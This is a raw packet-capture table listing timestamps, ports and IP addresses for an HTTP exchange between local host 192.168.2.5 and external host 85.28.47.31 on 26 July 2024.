Jul 26, 2024 17:56:06.089061975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089071035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089082003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089093924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.089109898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.089378119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089390039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089399099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089410067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089420080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089431047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089431047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.089443922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089449883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.089456081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089469910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089471102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.089490891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.089507103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.090053082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.090065002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.090075016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.090085983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.090096951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.090105057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.090137959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.090523958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.090536118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.090545893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.090557098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.090567112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.090572119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.090579033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.090595961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.090617895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.090922117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.090934992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.091048002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.167871952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.167969942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.167973042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.167984009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168011904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.168030977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.168100119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168112993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168124914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168140888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.168164968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.168235064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168282032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.168313026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168323994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168334007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168345928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168359041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168363094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.168416977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.168723106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168735027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168746948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168757915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168768883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168776035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.168778896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168790102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.168807983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.168843985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.169114113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169125080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169167042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.169258118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169280052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169291973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169302940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169310093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.169313908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169323921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169334888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169337988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.169344902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169354916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169361115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169370890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.169388056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.169406891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.169869900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169883013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169893026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169903994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169914961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.169923067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.169941902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.169967890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.170140028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.170152903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.170188904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.170190096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.170202017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.170207977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.170212984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.170223951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.170224905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.170243025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.170264006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.175247908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.175309896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.175538063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.175584078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.175717115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.175767899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.175770044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.175806046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.175872087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.175882101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.175921917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.176002979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176016092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176027060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176048994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.176079988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.176239967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176251888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176261902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176271915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176282883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176290035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.176292896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176312923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.176331043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.176636934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176649094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176659107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176668882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176680088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176686049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.176691055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176702023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.176722050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.176753044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.177109957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.177120924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.177130938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.177141905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.177151918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.177161932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.177162886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.177172899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.177182913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.177184105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.177205086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.177233934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.177577972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.177591085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.177628994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.177655935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.181602955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.181638002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.181651115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.181665897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.181690931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.181714058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.181787014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.181798935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.181808949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.181819916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.181837082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.181866884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.182060003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182074070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182084084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182102919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182111979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.182116985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182127953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182132959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.182138920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182148933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182159901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.182161093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182199955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.182213068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.182749033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182760954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182770967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182780981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182795048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182806015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182812929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.182816029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182826996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182841063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182842016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.182852030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182857037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.182868004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182878971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.182895899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.183051109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.183373928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.183434010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.183438063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.183449030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.183481932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.183499098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.183585882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.183597088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.183607101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.183619022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.183638096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.183666945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.183815002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.183829069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.183875084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.265698910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.265904903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.266396999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.266408920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.266457081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.266494989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.266506910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.266519070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.266531944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.266551018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.266568899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.266982079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.266994953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.267004967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.267014980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.267026901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.267034054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.267038107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.267047882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.267057896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.267065048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.267070055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.267091036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.267110109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.268757105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268769979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268780947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268796921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268806934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268817902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268821001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.268831015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268841982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268848896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.268852949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268863916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.268865108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268877983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268887043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.268887997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268901110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268917084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268922091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.268928051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268939018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268949032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268954992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.268960953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268971920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268981934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.268984079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.269033909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.269052029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.269287109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269337893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.269390106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269403934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269438028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.269469023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269481897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269493103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269520044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.269536018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.269675970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269690990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269701958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269712925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269725084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269727945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.269756079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.269910097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269921064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269931078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269942045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269953012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269958973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.269963980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.269980907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.270004988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.270155907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.270205021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.270322084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.270335913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.270345926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.270355940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.270366907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.270378113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.270387888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.270389080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.270399094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.270406008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.270411015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.270421982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.270428896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.270431995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.270451069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.270474911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.271220922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271233082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271243095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271253109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271264076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271275043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271279097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.271286011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271296978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271301985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.271308899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271318913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271325111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.271328926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271339893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271347046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.271353006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271363974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271372080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.271374941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271385908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.271397114 CEST	49704	80	192.168.2.5	85.28.47.31
